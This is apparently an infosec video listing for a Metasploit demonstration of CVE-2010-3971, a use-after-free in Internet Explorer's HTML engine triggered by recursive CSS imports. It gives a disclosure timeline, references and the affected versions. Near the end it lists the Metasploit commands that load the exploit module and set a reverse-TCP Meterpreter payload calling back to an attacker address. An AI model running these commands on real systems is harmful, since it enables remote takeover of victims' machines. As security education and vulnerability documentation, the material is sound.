Description: Timeline :
Vulnerability discovered the 2010-11-29 by WooYun
Vulnerability disclosed the 2010-12-08 by WooYun
Vulnerability confirmed the 2010-12-09 by VUPEN Security
Vulnerability explained the 2010-12-16 by Nephi Johnson
Exploit released the 2010-12-20 by jduck
Provided by:
WooYun
d0c_s4vage
Nephi Johnson
jduck (Metasploit Team)
Reference(s) :
OSVDB-69796
SA42510
SA 2488013
CVE-2010-3971
EDB-ID-15708
EDB-ID-15746
MS11-003
Affected versions :
For Internet Explorer 8 :
Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2, Windows 7 32, Windows 7 x64, Windows Server 2008 R2 x64
For Internet Explorer 7 :
Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2
For Internet Explorer 6 :
Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 8 (mshtml.dll 8.0.6001.18999)
Description:
First disclosed, by WooYun, as a DoS vulnerability in Internet Explorer 8, this vulnerability has rapidly involve into a remote code execution vulnerability confirmed by VUPEN Security. Nephi Johnson, from BreakingPoint Systems, has explained the vulnerability and provide a first exploit, for IE8 on XP SP3, between his interesting article "When A DoS Isn't A DoS".
This Metasploit module exploit a memory corruption vulnerability within Microsoft HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution.
Metasploit Demo :
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
ipconfig
owned !
Tags: windows , internet explorer , css , 0day , metasploit , remote code execution , microsoft ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.